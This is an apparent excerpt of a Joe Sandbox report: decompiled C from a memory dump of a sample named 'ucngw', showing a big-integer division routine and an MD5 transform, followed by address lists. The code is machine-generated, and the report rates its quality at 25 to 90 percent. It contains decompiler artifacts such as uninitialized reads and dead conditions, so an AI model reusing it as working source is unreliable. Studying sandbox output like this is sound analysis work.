    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 90%
    			E10004950(signed int* _a4, signed int* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v52;
    				signed int _v56;
    				signed int _v60;
    				signed int _v64;
    				signed int _v68;
    				signed int _v72;
    				signed int _v76;
    				signed int* _v80;
    				char _v540;
    				signed int _v544;
    				signed int _t197;
    				signed int _t198;
    				signed int* _t200;
    				signed int _t201;
    				signed int _t204;
    				signed int _t206;
    				signed int _t208;
    				signed int _t209;
    				signed int _t213;
    				signed int _t219;
    				intOrPtr _t225;
    				void* _t228;
    				signed int _t230;
    				signed int _t247;
    				signed int _t250;
    				void* _t253;
    				signed int _t256;
    				signed int* _t262;
    				signed int _t263;
    				signed int _t264;
    				void* _t265;
    				intOrPtr* _t266;
    				signed int _t267;
    				signed int _t269;
    				signed int _t270;
    				signed int _t271;
    				signed int _t272;
    				signed int* _t274;
    				signed int* _t278;
    				signed int _t279;
    				signed int _t280;
    				intOrPtr _t282;
    				void* _t286;
    				signed char _t292;
    				signed int _t295;
    				signed int _t303;
    				signed int _t306;
    				signed int _t307;
    				signed int _t309;
    				signed int _t311;
    				signed int _t313;
    				intOrPtr* _t314;
    				signed int _t318;
    				signed int _t322;
    				signed int* _t328;
    				signed int _t330;
    				signed int _t331;
    				signed int _t333;
    				void* _t334;
    				signed int _t336;
    				signed int _t338;
    				signed int _t341;
    				signed int _t342;
    				signed int* _t344;
    				signed int _t349;
    				signed int _t351;
    				void* _t355;
    				signed int _t359;
    				signed int _t360;
    				signed int _t362;
    				signed int* _t368;
    				signed int* _t369;
    				signed int* _t370;
    				signed int* _t373;
    
    				_t262 = _a4;
    				_t197 =  *_t262;
    				if(_t197 != 0) {
    					_t328 = _a8;
    					_t267 =  *_t328;
    					__eflags = _t267;
    					if(_t267 != 0) {
    						_t3 = _t197 - 1; // -1
    						_t349 = _t3;
    						_t4 = _t267 - 1; // -1
    						_t198 = _t4;
    						_v16 = _t349;
    						__eflags = _t198;
    						if(_t198 != 0) {
    							__eflags = _t198 - _t349;
    							if(_t198 > _t349) {
    								L23:
    								__eflags = 0;
    								return 0;
    							} else {
    								_t46 = _t198 + 1; // 0x0
    								_t306 = _t349 - _t198;
    								_v60 = _t46;
    								_t269 = _t349;
    								__eflags = _t349 - _t306;
    								if(_t349 < _t306) {
    									L21:
    									_t306 = _t306 + 1;
    									__eflags = _t306;
    								} else {
    									_t368 =  &(_t262[_t349 + 1]);
    									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
    									__eflags = _t341;
    									while(1) {
    										__eflags =  *_t341 -  *_t368;
    										if( *_t341 !=  *_t368) {
    											break;
    										}
    										_t269 = _t269 - 1;
    										_t341 = _t341 - 4;
    										_t368 = _t368 - 4;
    										__eflags = _t269 - _t306;
    										if(_t269 >= _t306) {
    											continue;
    										} else {
    											goto L21;
    										}
    										goto L22;
    									}
    									_t369 = _a8;
    									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
    									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
    									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
    										goto L21;
    									}
    								}
    								L22:
    								__eflags = _t306;
    								if(__eflags != 0) {
    									_t330 = _v60;
    									_t200 = _a8;
    									_t351 =  *(_t200 + _t330 * 4);
    									_t64 = _t330 * 4; // 0xffff81c5
    									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
    									_v36 = _t201;
    									asm("bsr eax, esi");
    									_v56 = _t351;
    									if(__eflags == 0) {
    										_t270 = 0x20;
    									} else {
    										_t270 = 0x1f - _t201;
    									}
    									_v40 = _t270;
    									_v64 = 0x20 - _t270;
    									__eflags = _t270;
    									if(_t270 != 0) {
    										_t292 = _v40;
    										_v36 = _v36 << _t292;
    										_v56 = _t351 << _t292 | _v36 >> _v64;
    										__eflags = _t330 - 2;
    										if(_t330 > 2) {
    											_t79 = _t330 * 4; // 0xe850ffff
    											_t81 =  &_v36;
    											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
    											__eflags =  *_t81;
    										}
    									}
    									_v76 = 0;
    									_t307 = _t306 + 0xffffffff;
    									__eflags = _t307;
    									_v32 = _t307;
    									if(_t307 < 0) {
    										_t331 = 0;
    										__eflags = 0;
    									} else {
    										_t85 =  &(_t262[1]); // 0x4
    										_v20 =  &(_t85[_t307]);
    										_t206 = _t307 + _t330;
    										_t90 = _t262 - 4; // -4
    										_v12 = _t206;
    										_t278 = _t90 + _t206 * 4;
    										_v80 = _t278;
    										do {
    											__eflags = _t206 - _v16;
    											if(_t206 > _v16) {
    												_t207 = 0;
    												__eflags = 0;
    											} else {
    												_t207 = _t278[2];
    											}
    											__eflags = _v40;
    											_t311 = _t278[1];
    											_t279 =  *_t278;
    											_v52 = _t207;
    											_v44 = 0;
    											_v8 = _t207;
    											_v24 = _t279;
    											if(_v40 > 0) {
    												_t318 = _v8;
    												_t336 = _t279 >> _v64;
    												_t230 = E100100A0(_t311, _v40, _t318);
    												_t279 = _v40;
    												_t207 = _t318;
    												_t311 = _t336 | _t230;
    												_t359 = _v24 << _t279;
    												__eflags = _v12 - 3;
    												_v8 = _t318;
    												_v24 = _t359;
    												if(_v12 >= 3) {
    													_t279 = _v64;
    													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
    													__eflags = _t360;
    													_t207 = _v8;
    													_v24 = _t360;
    												}
    											}
    											_t208 = E1000FFC0(_t311, _t207, _v56, 0);
    											_v44 = _t262;
    											_t263 = _t208;
    											_v44 = 0;
    											_t209 = _t311;
    											_v8 = _t263;
    											_v28 = _t209;
    											_t333 = _t279;
    											_v72 = _t263;
    											_v68 = _t209;
    											__eflags = _t209;
    											if(_t209 != 0) {
    												L40:
    												_t264 = _t263 + 1;
    												asm("adc eax, 0xffffffff");
    												_t333 = _t333 + E10010060(_t264, _t209, _v56, 0);
    												asm("adc esi, edx");
    												_t263 = _t264 | 0xffffffff;
    												_t209 = 0;
    												__eflags = 0;
    												_v44 = 0;
    												_v8 = _t263;
    												_v72 = _t263;
    												_v28 = 0;
    												_v68 = 0;
    											} else {
    												__eflags = _t263 - 0xffffffff;
    												if(_t263 > 0xffffffff) {
    													goto L40;
    												}
    											}
    											__eflags = 0;
    											if(0 <= 0) {
    												if(0 < 0) {
    													goto L44;
    												} else {
    													__eflags = _t333 - 0xffffffff;
    													if(_t333 <= 0xffffffff) {
    														while(1) {
    															L44:
    															_v8 = _v24;
    															_t228 = E10010060(_v36, 0, _t263, _t209);
    															__eflags = _t311 - _t333;
    															if(__eflags < 0) {
    																break;
    															}
    															if(__eflags > 0) {
    																L47:
    																_t209 = _v28;
    																_t263 = _t263 + 0xffffffff;
    																_v72 = _t263;
    																asm("adc eax, 0xffffffff");
    																_t333 = _t333 + _v56;
    																__eflags = _t333;
    																_v28 = _t209;
    																asm("adc dword [ebp-0x28], 0x0");
    																_v68 = _t209;
    																if(_t333 == 0) {
    																	__eflags = _t333 - 0xffffffff;
    																	if(_t333 <= 0xffffffff) {
    																		continue;
    																	} else {
    																	}
    																}
    															} else {
    																__eflags = _t228 - _v8;
    																if(_t228 <= _v8) {
    																	break;
    																} else {
    																	goto L47;
    																}
    															}
    															L51:
    															_v8 = _t263;
    															goto L52;
    														}
    														_t209 = _v28;
    														goto L51;
    													}
    												}
    											}
    											L52:
    											__eflags = _t209;
    											if(_t209 != 0) {
    												L54:
    												_t280 = _v60;
    												_t334 = 0;
    												_t355 = 0;
    												__eflags = _t280;
    												if(_t280 != 0) {
    													_t266 = _v20;
    													_t219 =  &(_a8[1]);
    													__eflags = _t219;
    													_v24 = _t219;
    													_v16 = _t280;
    													do {
    														_v44 =  *_t219;
    														_t225 =  *_t266;
    														_t286 = _t334 + _v72 * _v44;
    														asm("adc esi, edx");
    														_t334 = _t355;
    														_t355 = 0;
    														__eflags = _t225 - _t286;
    														if(_t225 < _t286) {
    															_t334 = _t334 + 1;
    															asm("adc esi, esi");
    														}
    														 *_t266 = _t225 - _t286;
    														_t266 = _t266 + 4;
    														_t219 = _v24 + 4;
    														_t164 =  &_v16;
    														 *_t164 = _v16 - 1;
    														__eflags =  *_t164;
    														_v24 = _t219;
    													} while ( *_t164 != 0);
    													_t263 = _v8;
    													_t280 = _v60;
    												}
    												__eflags = 0 - _t355;
    												if(__eflags <= 0) {
    													if(__eflags < 0) {
    														L63:
    														__eflags = _t280;
    														if(_t280 != 0) {
    															_t338 = _t280;
    															_t314 = _v20;
    															_t362 =  &(_a8[1]);
    															__eflags = _t362;
    															_t265 = 0;
    															do {
    																_t282 =  *_t314;
    																_t172 = _t362 + 4; // 0xa6a5959
    																_t362 = _t172;
    																_t314 = _t314 + 4;
    																asm("adc eax, eax");
    																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
    																asm("adc eax, 0x0");
    																_t265 = 0;
    																_t338 = _t338 - 1;
    																__eflags = _t338;
    															} while (_t338 != 0);
    															_t263 = _v8;
    														}
    														_t263 = _t263 + 0xffffffff;
    														asm("adc dword [ebp-0x18], 0xffffffff");
    													} else {
    														__eflags = _v52 - _t334;
    														if(_v52 < _t334) {
    															goto L63;
    														}
    													}
    												}
    												_t213 = _v12 - 1;
    												__eflags = _t213;
    												_v16 = _t213;
    											} else {
    												__eflags = _t263;
    												if(_t263 != 0) {
    													goto L54;
    												}
    											}
    											_t331 = 0 + _t263;
    											asm("adc esi, 0x0");
    											_v20 = _v20 - 4;
    											_t313 = _v32 - 1;
    											_t262 = _a4;
    											_t278 = _v80 - 4;
    											_t206 = _v12 - 1;
    											_v76 = _t331;
    											_v32 = _t313;
    											_v80 = _t278;
    											_v12 = _t206;
    											__eflags = _t313;
    										} while (_t313 >= 0);
    									}
    									_t309 = _v16 + 1;
    									_t204 = _t309;
    									__eflags = _t204 -  *_t262;
    									if(_t204 <  *_t262) {
    										_t191 = _t204 + 1; // 0x1000c78d
    										_t274 =  &(_t262[_t191]);
    										do {
    											 *_t274 = 0;
    											_t194 =  &(_t274[1]); // 0x91850fc2
    											_t274 = _t194;
    											_t204 = _t204 + 1;
    											__eflags = _t204 -  *_t262;
    										} while (_t204 <  *_t262);
    									}
    									 *_t262 = _t309;
    									__eflags = _t309;
    									if(_t309 != 0) {
    										while(1) {
    											_t271 =  *_t262;
    											__eflags = _t262[_t271];
    											if(_t262[_t271] != 0) {
    												goto L78;
    											}
    											_t272 = _t271 + 0xffffffff;
    											__eflags = _t272;
    											 *_t262 = _t272;
    											if(_t272 != 0) {
    												continue;
    											}
    											goto L78;
    										}
    									}
    									L78:
    									return _t331;
    								} else {
    									goto L23;
    								}
    							}
    						} else {
    							_t6 =  &(_t328[1]); // 0xfc23b5a
    							_t295 =  *_t6;
    							_v44 = _t295;
    							__eflags = _t295 - 1;
    							if(_t295 != 1) {
    								__eflags = _t349;
    								if(_t349 != 0) {
    									_t342 = 0;
    									_v12 = 0;
    									_v8 = 0;
    									_v20 = 0;
    									__eflags = _t349 - 0xffffffff;
    									if(_t349 != 0xffffffff) {
    										_t250 = _v16 + 1;
    										__eflags = _t250;
    										_v32 = _t250;
    										_t373 =  &(_t262[_t349 + 1]);
    										do {
    											_t253 = E1000FFC0( *_t373, _t342, _t295, 0);
    											_v68 = _t303;
    											_t373 = _t373 - 4;
    											_v20 = _t262;
    											_t342 = _t295;
    											_t303 = 0 + _t253;
    											asm("adc ecx, 0x0");
    											_v12 = _t303;
    											_t34 =  &_v32;
    											 *_t34 = _v32 - 1;
    											__eflags =  *_t34;
    											_v8 = _v12;
    											_t295 = _v44;
    										} while ( *_t34 != 0);
    										_t262 = _a4;
    									}
    									_v544 = 0;
    									_t41 =  &(_t262[1]); // 0x4
    									_t370 = _t41;
    									 *_t262 = 0;
    									E1000C9BA(_t370, 0x1cc,  &_v540, 0);
    									_t247 = _v20;
    									__eflags = 0 - _t247;
    									 *_t370 = _t342;
    									_t262[2] = _t247;
    									asm("sbb ecx, ecx");
    									__eflags =  ~0x00000000;
    									 *_t262 = 0xbadbae;
    									return _v12;
    								} else {
    									_t14 =  &(_t262[1]); // 0x4
    									_t344 = _t14;
    									_v544 = 0;
    									 *_t262 = 0;
    									E1000C9BA(_t344, 0x1cc,  &_v540, 0);
    									_t256 = _t262[1];
    									_t322 = _t256 % _v44;
    									__eflags = 0 - _t322;
    									 *_t344 = _t322;
    									asm("sbb ecx, ecx");
    									__eflags = 0;
    									 *_t262 =  ~0x00000000;
    									return _t256 / _v44;
    								}
    							} else {
    								_t9 =  &(_t262[1]); // 0x4
    								_v544 = _t198;
    								 *_t262 = _t198;
    								E1000C9BA(_t9, 0x1cc,  &_v540, _t198);
    								__eflags = 0;
    								return _t262[1];
    							}
    						}
    					} else {
    						__eflags = 0;
    						return 0;
    					}
    				} else {
    					return _t197;
    				}
    			}
    0x10004d50
    0x10004d50
    0x10004d52
    0x10004d52
    0x10004d57
    0x10004d5d
    0x10004d61
    0x10004d64
    0x10004d67
    0x10004d69
    0x10004d69
    0x10004d69
    0x10004d6e
    0x10004d6e
    0x10004d71
    0x10004d74
    0x10004d33
    0x10004d33
    0x10004d36
    0x00000000
    0x00000000
    0x10004d36
    0x10004d31
    0x10004d7b
    0x10004d7b
    0x10004d7c
    0x10004cc3
    0x10004cc3
    0x10004cc5
    0x00000000
    0x00000000
    0x10004cc5
    0x10004d8c
    0x10004d91
    0x10004d94
    0x10004d98
    0x10004d99
    0x10004d9c
    0x10004d9f
    0x10004da0
    0x10004da3
    0x10004da6
    0x10004da9
    0x10004dac
    0x10004dac
    0x10004db4
    0x10004dbb
    0x10004dbc
    0x10004dbe
    0x10004dc0
    0x10004dc2
    0x10004dc5
    0x10004dd0
    0x10004dd0
    0x10004dd6
    0x10004dd6
    0x10004dd9
    0x10004dda
    0x10004dda
    0x10004dd0
    0x10004dde
    0x10004de0
    0x10004de2
    0x10004de4
    0x10004de4
    0x10004de6
    0x10004dea
    0x00000000
    0x00000000
    0x10004dec
    0x10004dec
    0x10004def
    0x10004df1
    0x00000000
    0x00000000
    0x00000000
    0x10004df1
    0x10004de4
    0x10004df3
    0x10004dfd
    0x00000000
    0x00000000
    0x00000000
    0x10004b08
    0x10004992
    0x10004992
    0x10004992
    0x10004995
    0x10004998
    0x1000499b
    0x100049cc
    0x100049ce
    0x10004a19
    0x10004a1b
    0x10004a22
    0x10004a29
    0x10004a2c
    0x10004a2f
    0x10004a35
    0x10004a35
    0x10004a36
    0x10004a39
    0x10004a40
    0x10004a49
    0x10004a4e
    0x10004a51
    0x10004a56
    0x10004a59
    0x10004a5b
    0x10004a60
    0x10004a63
    0x10004a66
    0x10004a66
    0x10004a66
    0x10004a6a
    0x10004a6d
    0x10004a6d
    0x10004a72
    0x10004a72
    0x10004a7d
    0x10004a88
    0x10004a88
    0x10004a8b
    0x10004a97
    0x10004a9c
    0x10004aa7
    0x10004aa9
    0x10004aab
    0x10004ab1
    0x10004ab6
    0x10004ab8
    0x10004abe
    0x100049d0
    0x100049dc
    0x100049dc
    0x100049df
    0x100049ef
    0x100049f5
    0x100049fc
    0x100049fe
    0x10004a06
    0x10004a08
    0x10004a0a
    0x10004a0f
    0x10004a12
    0x10004a18
    0x10004a18
    0x1000499d
    0x100049a0
    0x100049a4
    0x100049aa
    0x100049b9
    0x100049c3
    0x100049cb
    0x100049cb
    0x1000499b
    0x10004976
    0x10004979
    0x1000497f
    0x1000497f
    0x10004965
    0x1000496b
    0x1000496b

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 25%
    			E00C61150(intOrPtr __ecx, void* __edx) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				signed int _v76;
    				intOrPtr _v80;
    				signed int _v84;
    				signed int _v88;
    				signed int _v92;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t120;
    				void* _t122;
    				signed int _t341;
    				intOrPtr _t342;
    				signed int _t346;
    				signed int _t348;
    				signed int _t350;
    				signed int _t354;
    				signed int _t356;
    				signed int _t358;
    				signed int _t360;
    				signed int _t364;
    				signed int _t366;
    				signed int _t368;
    				signed int _t371;
    				signed int _t372;
    				signed int _t464;
    				signed int _t547;
    				signed int _t552;
    				signed int _t557;
    				signed int _t561;
    				signed int _t563;
    				signed int _t565;
    				signed int _t567;
    				signed int _t570;
    				signed int _t574;
    				signed int _t586;
    				signed int _t588;
    				signed int _t590;
    				signed int _t592;
    				signed int _t594;
    				signed int _t599;
    				signed int _t601;
    				signed int _t603;
    				signed int _t606;
    				signed int _t608;
    				signed int _t610;
    				signed int _t612;
    				signed int _t617;
    				signed int _t619;
    				signed int _t621;
    				signed int _t623;
    				signed int _t625;
    				signed int _t628;
    				signed int _t629;
    				signed int _t633;
    				signed int _t635;
    				signed int _t637;
    				signed int _t640;
    				signed int _t644;
    				signed int _t646;
    				signed int _t648;
    				signed int _t650;
    				signed int _t653;
    				signed int _t655;
    				signed int _t657;
    				signed int _t659;
    				signed int _t661;
    				signed int _t663;
    				signed int _t665;
    				signed int _t667;
    				intOrPtr _t668;
    				signed int _t669;
    				signed int _t670;
    				signed int _t673;
    				signed int _t675;
    				signed int _t677;
    				signed int _t679;
    				signed int _t684;
    				signed int _t686;
    				signed int _t688;
    				signed int _t692;
    				signed int _t694;
    				signed int _t696;
    				signed int _t698;
    				signed int _t700;
    				signed int _t702;
    				signed int _t704;
    				signed int _t707;
    				signed int _t712;
    
    				_t120 =  *0xc6a004; // 0x26d30358
    				_v8 = _t120 ^ _t712;
    				_t122 = __edx + 2;
    				_v80 = __ecx;
    				_t669 = 0;
    				do {
    					_t574 =  *(_t122 + 1) & 0x000000ff;
    					_t122 = _t122 + 4;
    					 *((intOrPtr*)(_t712 + _t669 * 4 - 0x44)) = (((_t574 << 8) + ( *(_t122 - 4) & 0x000000ff) << 8) + ( *(_t122 - 5) & 0x000000ff) << 8) + ( *(_t122 - 6) & 0x000000ff);
    					_t669 = _t669 + 1;
    				} while (_t669 < 0x10);
    				_t629 =  *(__ecx + 0x54);
    				_t670 =  *(__ecx + 0x58);
    				_t341 =  *(__ecx + 0x5c);
    				asm("rol edx, 0x7");
    				_t586 = _v72 + 0xd76aa478 + ( !_t629 & _t341 | _t670 & _t629) +  *((intOrPtr*)(_v80 + 0x50)) + _t629;
    				_t342 = _v80;
    				asm("rol esi, 0xc");
    				_t673 = _t341 - 0x173848aa + ( !_t586 & _t670 | _t629 & _t586) + _v68 + _t586;
    				asm("ror edi, 0xf");
    				_t633 =  *((intOrPtr*)(_t342 + 0x58)) + 0x242070db + ( !_t673 & _t629 | _t673 & _t586) + _v64 + _t673;
    				asm("ror ebx, 0xa");
    				_t346 =  *((intOrPtr*)(_t342 + 0x54)) + 0xc1bdceee + ( !_t633 & _t586 | _t673 & _t633) + _v60 + _t633;
    				asm("rol edx, 0x7");
    				_t588 = _t586 + ( !_t346 & _t673 | _t633 & _t346) + 0xf57c0faf + _v56 + _t346;
    				asm("rol esi, 0xc");
    				_t675 = _t673 + ( !_t588 & _t633 | _t346 & _t588) + 0x4787c62a + _v52 + _t588;
    				asm("ror edi, 0xf");
    				_t635 = _t633 + ( !_t675 & _t346 | _t675 & _t588) + 0xa8304613 + _v48 + _t675;
    				asm("ror ebx, 0xa");
    				_t348 = _t346 + ( !_t635 & _t588 | _t675 & _t635) + 0xfd469501 + _v44 + _t635;
    				asm("rol edx, 0x7");
    				_t590 = _t588 + ( !_t348 & _t675 | _t635 & _t348) + 0x698098d8 + _v40 + _t348;
    				asm("rol esi, 0xc");
    				_t677 = _t675 + ( !_t590 & _t635 | _t348 & _t590) + 0x8b44f7af + _v36 + _t590;
    				asm("ror edi, 0xf");
    				_t637 = _t635 + ( !_t677 & _t348 | _t677 & _t590) + 0xffff5bb1 + _v32 + _t677;
    				_v92 = _t637;
    				asm("ror ebx, 0xa");
    				_t350 = _t348 + ( !_t637 & _t590 | _t677 & _t637) + 0x895cd7be + _v28 + _t637;
    				_v84 = _t350;
    				asm("rol edx, 0x7");
    				_t592 = _t590 + ( !_t350 & _t677 | _t637 & _t350) + 0x6b901122 + _v24 + _t350;
    				_v88 = _t592;
    				asm("rol edi, 0xc");
    				_t640 = _t677 - 0x2678e6d + ( !_t592 & _t637 | _t350 & _t592) + _v20 + _t592;
    				_v76 = _t640;
    				_t679 =  !_t640;
    				asm("ror ebx, 0xf");
    				_t354 = _v92 + 0xa679438e + (_t679 & _t350 | _t640 & _t592) + _v16 + _t640;
    				_t594 =  !_t354;
    				_t464 = _v76;
    				asm("ror edi, 0xa");
    				_t644 = _v84 + 0x49b40821 + (_t594 & _v88 | _t640 & _t354) + _v12 + _t354;
    				asm("rol esi, 0x5");
    				_t684 = (_t679 & _t354 | _t464 & _t644) + _v68 + _v88 + 0xf61e2562 + _t644;
    				asm("rol edx, 0x9");
    				_t599 = (_t594 & _t644 | _t354 & _t684) + _v48 + _t464 + 0xc040b340 + _t684;
    				asm("rol ebx, 0xe");
    				_t356 = _t354 + ( !_t644 & _t684 | _t599 & _t644) + 0x265e5a51 + _v28 + _t599;
    				asm("ror edi, 0xc");
    				_t646 = _t644 + ( !_t684 & _t599 | _t356 & _t684) + 0xe9b6c7aa + _v72 + _t356;
    				asm("rol esi, 0x5");
    				_t686 = _t684 + ( !_t599 & _t356 | _t599 & _t646) + 0xd62f105d + _v52 + _t646;
    				asm("rol edx, 0x9");
    				_t601 = _t599 + ( !_t356 & _t646 | _t356 & _t686) + 0x2441453 + _v32 + _t686;
    				asm("rol ebx, 0xe");
    				_t358 = _t356 + ( !_t646 & _t686 | _t601 & _t646) + 0xd8a1e681 + _v12 + _t601;
    				asm("ror edi, 0xc");
    				_t648 = _t646 + ( !_t686 & _t601 | _t358 & _t686) + 0xe7d3fbc8 + _v56 + _t358;
    				asm("rol esi, 0x5");
    				_t688 = _t686 + ( !_t601 & _t358 | _t601 & _t648) + 0x21e1cde6 + _v36 + _t648;
    				asm("rol edx, 0x9");
    				_t603 = _t601 + ( !_t358 & _t648 | _t358 & _t688) + 0xc33707d6 + _v16 + _t688;
    				_v76 = _t603;
    				asm("rol ebx, 0xe");
    				_t360 = _t358 + ( !_t648 & _t688 | _t603 & _t648) + 0xf4d50d87 + _v60 + _t603;
    				asm("ror edi, 0xc");
    				_t650 = _t648 + ( !_t688 & _t603 | _t360 & _t688) + 0x455a14ed + _v40 + _t360;
    				_v84 = _t650;
    				_t61 = _t688 - 0x561c16fb; // -1444681403
    				asm("rol edx, 0x5");
    				_t606 = _t61 + ( !_t603 & _t360 | _t603 & _t650) + _v20 + _t650;
    				asm("rol esi, 0x9");
    				_t692 = _v76 + 0xfcefa3f8 + ( !_t360 & _t650 | _t360 & _t606) + _v64 + _t606;
    				asm("rol edi, 0xe");
    				_t653 = _t360 + 0x676f02d9 + ( !_t650 & _t606 | _t692 & _t650) + _v44 + _t692;
    				asm("ror ebx, 0xc");
    				_t364 = _v84 + 0x8d2a4c8a + ( !_t606 & _t692 | _t653 & _t606) + _v24 + _t653;
    				asm("rol edx, 0x4");
    				_t608 = _t606 + (_t692 ^ _t653 ^ _t364) + 0xfffa3942 + _v52 + _t364;
    				asm("rol esi, 0xb");
    				_t694 = _t692 + (_t653 ^ _t364 ^ _t608) + 0x8771f681 + _v40 + _t608;
    				asm("rol edi, 0x10");
    				_t655 = _t653 + (_t694 ^ _t364 ^ _t608) + 0x6d9d6122 + _v28 + _t694;
    				_t547 = _t694 ^ _t655;
    				asm("ror ebx, 0x9");
    				_t366 = _t364 + (_t547 ^ _t608) + 0xfde5380c + _v16 + _t655;
    				asm("rol edx, 0x4");
    				_t610 = _t608 + (_t547 ^ _t366) + 0xa4beea44 + _v68 + _t366;
    				asm("rol esi, 0xb");
    				_t696 = _t694 + (_t655 ^ _t366 ^ _t610) + 0x4bdecfa9 + _v56 + _t610;
    				asm("rol edi, 0x10");
    				_t657 = _t655 + (_t696 ^ _t366 ^ _t610) + 0xf6bb4b60 + _v44 + _t696;
    				_t552 = _t696 ^ _t657;
    				asm("ror ebx, 0x9");
    				_t368 = _t366 + (_t552 ^ _t610) + 0xbebfbc70 + _v32 + _t657;
    				asm("rol edx, 0x4");
    				_t612 = _t610 + (_t552 ^ _t368) + 0x289b7ec6 + _v20 + _t368;
    				_v76 = _t612;
    				asm("rol esi, 0xb");
    				_t698 = _t696 + (_t657 ^ _t368 ^ _t612) + 0xeaa127fa + _v72 + _t612;
    				asm("rol edi, 0x10");
    				_t659 = _t657 + (_t698 ^ _t368 ^ _t612) + 0xd4ef3085 + _v60 + _t698;
    				_t557 = _t698 ^ _t659;
    				asm("ror edx, 0x9");
    				_t617 = (_t612 ^ _t557) + 0x4881d05 + _v48 + _t368 + _t659;
    				asm("rol ecx, 0x4");
    				_t561 = (_t557 ^ _t617) + _v36 + _v76 + 0xd9d4d039 + _t617;
    				asm("rol esi, 0xb");
    				_t700 = _t698 + (_t659 ^ _t617 ^ _t561) + 0xe6db99e5 + _v24 + _t561;
    				asm("rol edi, 0x10");
    				_t661 = _t659 + (_t700 ^ _t617 ^ _t561) + 0x1fa27cf8 + _v12 + _t700;
    				asm("ror edx, 0x9");
    				_t619 = _t617 + (_t700 ^ _t661 ^ _t561) + 0xc4ac5665 + _v64 + _t661;
    				asm("rol ecx, 0x6");
    				_t563 = _t561 + (( !_t700 | _t619) ^ _t661) + 0xf4292244 + _v72 + _t619;
    				asm("rol esi, 0xa");
    				_t702 = _t700 + (( !_t661 | _t563) ^ _t619) + 0x432aff97 + _v44 + _t563;
    				asm("rol edi, 0xf");
    				_t663 = _t661 + (( !_t619 | _t702) ^ _t563) + 0xab9423a7 + _v16 + _t702;
    				asm("ror edx, 0xb");
    				_t621 = _t619 + (( !_t563 | _t663) ^ _t702) + 0xfc93a039 + _v52 + _t663;
    				asm("rol ecx, 0x6");
    				_t565 = _t563 + (( !_t702 | _t621) ^ _t663) + 0x655b59c3 + _v24 + _t621;
    				asm("rol esi, 0xa");
    				_t704 = _t702 + (( !_t663 | _t565) ^ _t621) + 0x8f0ccc92 + _v60 + _t565;
    				asm("rol edi, 0xf");
    				_t665 = _t663 + (( !_t621 | _t704) ^ _t565) + 0xffeff47d + _v32 + _t704;
    				asm("ror edx, 0xb");
    				_t623 = _t621 + (( !_t565 | _t665) ^ _t704) + 0x85845dd1 + _v68 + _t665;
    				asm("rol ecx, 0x6");
    				_t567 = _t565 + (( !_t704 | _t623) ^ _t665) + 0x6fa87e4f + _v40 + _t623;
    				asm("rol ebx, 0xa");
    				_t371 = _t704 - 0x1d31920 + (( !_t665 | _t567) ^ _t623) + _v12 + _t567;
    				asm("rol edi, 0xf");
    				_t667 = _t665 + (( !_t623 | _t371) ^ _t567) + 0xa3014314 + _v48 + _t371;
    				asm("ror edx, 0xb");
    				_t625 = _t623 + (( !_t567 | _t667) ^ _t371) + 0x4e0811a1 + _v20 + _t667;
    				_v76 = _t625;
    				_t668 = _v80;
    				asm("rol esi, 0x6");
    				_t707 = _t567 - 0x8ac817e + (( !_t371 | _t625) ^ _t667) + _v56 + _t625;
    				 *((intOrPtr*)(_t668 + 0x50)) =  *((intOrPtr*)(_t668 + 0x50)) + _t707;
    				_t372 = _v76;
    				asm("rol edx, 0xa");
    				_t628 = _t371 - 0x42c50dcb + (( !_t667 | _t707) ^ _t625) + _v28 + _t707;
    				asm("rol ecx, 0xf");
    				_t570 = _t667 + 0x2ad7d2bb + (( !_t372 | _t628) ^ _t707) + _v64 + _t628;
    				 *((intOrPtr*)(_t668 + 0x58)) =  *((intOrPtr*)(_t668 + 0x58)) + _t570;
    				asm("ror eax, 0xb");
    				 *((intOrPtr*)(_t668 + 0x5c)) =  *((intOrPtr*)(_t668 + 0x5c)) + _t628;
    				 *((intOrPtr*)(_t668 + 0x54)) = _t372 - 0x14792c6f + (( !_t707 | _t570) ^ _t628) + _v36 +  *((intOrPtr*)(_t668 + 0x54)) + _t570;
    				return E00C51252(_t372, _v8 ^ _t712, _t668, (( !_t707 | _t570) ^ _t628) + _v36);
    			}
